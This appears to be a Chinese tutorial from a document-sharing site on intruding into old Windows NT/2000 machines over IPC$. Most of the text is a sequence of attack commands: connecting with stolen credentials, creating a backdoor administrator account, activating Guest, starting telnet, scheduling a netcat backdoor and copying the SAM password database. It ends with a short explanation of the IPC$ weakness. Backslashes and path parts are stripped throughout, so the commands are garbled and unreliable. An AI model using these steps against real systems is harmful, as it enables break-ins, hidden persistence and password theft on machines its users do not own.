《计算机一般网络安全所需要的几个常用命令》由会员分享,可在线阅读,更多相关《计算机一般网络安全所需要的几个常用命令(5页珍藏版)》请在金锄头文库上搜索。
1、一般入侵所需要的几个常用命令1:NET 只要你拥有某IP的用户名和密码,那就用IPC$做连接吧!net use 127.0.0.1$ 456 /user:hbx退出的命令是net use 127.0.0.1$ /delte下面的操作你必须登陆后才可以用.登陆的方法就在上面.-下面我们讲怎么创建一个用户,由于SA的权限相当于系统的超级用户.我们加一个heibai的用户密码为lovechinanet user heibai lovechina /add只要显示命令成功,那么我们可以把他加入Administrator组了.net localgroup Administrators heibai /a
2、dd-=这里是讲映射对方的C盘,当然其他盘也可以,只要存在就行了.我们这里把对方的C盘映射到本地的Z盘.=net use z:127.0.0.1$-net start telnet这样可以打开对方的TELNET服务.-这里是将Guest用户激活,guest是NT的默认用户,而且无法删除呢?不知道是否这样,我的2000就是删除不了它。net user guest /active:yes-这里是把一个用户的密码改掉,我们把guest的密码改为lovechina,其他用户也可以的。只要有权限就行了呀!net user guest lovechinanet命令果然强大啊!2:at一般一个入侵者入侵后都
3、会留下后门,也就是种木马了,你把木马传了上去,怎么启动他呢?那么需要用AT命令,这里假设你已经登陆了那个服务器。你首先要得到对方的时间,将会返回一个时间,这里假设时间为12:1,现在需要新建一个作业,其ID=1at 127.0.0.1 12:3 nc.exe这里假设了一个木马,名为NC.EXE,这个东西要在对方服务器上.这里介绍一下NC,NC是NETCAT的简称,为了方便输入,一般会被改名.它是一个TELNET服务,端口为 99.等到了12:3就可以连接到对方的99端口.这样就给对方种下了木马.3:telnet这个命令非常实用,它可以与远方做连接,不过正常下需要密码、用户,不过你给对方种了木马
4、,直接连到这个木马打开的端口.telnet 127.0.0.1 99这样就可以连到对方的99端口.那你就可以在对方运行命令了,这个也就是肉鸡.4:FTP它可以将你的东西传到对方机子上,你可以去申请个支持FTP上传的空间,国内多的是,如果真的找不到,我给个WWW.51.NET,不错的.当我们申请完 后,?.,以及FTP服务器.在上传前需要登陆先,这里我们假设FTP服务器是WWW.51.NET,用户名是HUCJS,密码是654321他会要求输入用户,成功后会要求输入密码.-下面先说上传,假设你需上传的文件是INDEX.HTM,它位于C:u19979,传到对方D:parget c:.htm d:pa
5、r假设你要把对方C盘下的INDEX.HTM,下到你的机子的D盘下put c:.htm d:par5:copy下面我说说怎样把本地的文件复制到对方硬盘上去,需要建立好IPC$连接才有效。这里我们把本地C盘下的index.htm复制到127.0.0.1的C盘下copy index.htm 127.0.0.1$.htm-9:29 2007-1-17如果你要复制到D盘下把C改为D,就行了!copy index.htm 127.0.0.1$.htm-如果你要把他复制到WINNT目录里就要把输入copy index.htm 127.0.0.1$.htmadmin$是winnt-要把对方的文件复制过来,顺便
6、告诉大家NT的备份的数据库放在x:._ sam._是数据库的文件名下面就把127.0.0.1的数据库复制到本地C盘下copy 127.0.0.1$._ c:par-del C:经典入侵技术 一、 永恒的IPC$ 编辑部评审意见: 众所周知,安全问题是一个极具时效的问题,就拿两年前百试不爽的.printer溢出和unicode来说吧,在本年度基本上就没怎么再见有还用! 然而似乎也有例外,针对IPC$问题的攻击就常用常新。 什么是IPC$漏洞: IPC$是共享“命名管道”的资源,主要用于程序间的通讯。在远程管理计算机和查看计算机的共享资源时使用。利用默认的IPC$我们可以与目标主机建立一个空的连接(无需用户名与密码),而利用这个空的连接,我们就可以得目标主机上的用户列表。 我们总在说ipc$漏洞ipc$漏洞,其实,ipc$并不是真正意义上的漏洞,它是为了方便管理员的远程管理而开放的远程网络登陆功能,而且还打开了默认共享,即所有的逻辑盘(c$,d$,e$)和系统目录winnt或windows(admin$)。 所有的这些,初衷都是为了方便管理员的管理,但好的初衷并不一定有好的收效,一些别有用心者(到底是什么用心?我也不知道,代词一个)会利用IPC$,访问共享资源,导出用户列表,并使用一些字典工具,进行密码探测,寄希望于获得更高的权限,从而达到不可告人的目的。
